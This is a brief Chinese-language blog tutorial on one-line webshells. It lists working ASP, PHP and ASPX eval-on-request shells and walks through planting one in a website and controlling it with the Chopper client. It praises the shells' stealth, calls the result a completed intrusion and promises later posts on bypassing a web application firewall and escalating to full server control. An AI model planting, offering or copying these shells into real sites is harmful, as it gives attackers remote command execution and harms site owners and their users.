好久没有更新文章了,今天来更新一篇文章,还是很基本的东西
一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用。
常用一句话木马
asp一句话木马:
<%execute( Request (“value”))%>
php一句话木马:
<?php @eval($_POST[value]);?>
aspx 一句话木马:
<%@ Page Language=”Jscript”%>
<%eval(Request.Item[“value”])%>
这里不讲入侵的详细步骤,讲一下原理 以我搭建的环境为例
这个网站的源代码有需要的也可以找我要一下,
1,首先我们在源代码中植入一句话木马,这个上传的方式有很多,大家可以去试一下,如果有 安全狗 拦截 以后我们会讲绕过安全狗的方法,
这个网站的是asp格式的,我们在网站源码中新建一个记事本,输入<%eval request(“c”)%> c是自己定义的,保存为asp格式,命名为1
2,接下来 我们访问这个asp
我们看到我们访问的页面什么都没有,这是正确的
3,我们使用菜刀工具
右键添加 点击添加
然后双击打开,
入侵完成,我们可以进一步的提权,拿下整个服务器。
下期会讲图片传入一句话木马,和大小马的用处